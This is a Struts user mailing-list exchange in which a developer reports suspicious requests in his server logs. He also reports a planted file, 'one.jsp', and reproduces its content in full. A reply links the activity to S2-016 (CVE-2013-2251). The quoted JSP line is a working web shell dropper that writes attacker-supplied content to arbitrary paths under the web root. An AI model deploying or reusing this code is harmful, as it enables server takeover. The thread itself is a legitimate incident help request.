Hi Yasser, I am using struts2 2.3.16.1 version. That may be the reason 404 error is returned. But still i got a new file "one.jsp", inside the WAR. It has only one IF condition as give below:-
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> Regards, Raj On Tue, Feb 13, 2018 at 5:43 PM, Yasser Zamani <yasserzam...@apache.org> wrote: > > > On 2/13/2018 12:34 PM, Rajvinder Pal wrote: > > Hi, > > > > I have a struts application deployed on application server. Some time I > am > > receiving the below requests in web server logs. Not sure if i can post > it > > in this struts forum. What should i do to restrict it?What kind of > > vulnerability it is ? > > Hi, > > It seems it's S2-016 [1] (CVE-2013-2251 [2]). > > [1] https://cwiki.apache.org/confluence/display/WW/S2-016 > [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251 > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: user-unsubscr...@struts.apache.org > For additional commands, e-mail: user-h...@struts.apache.org >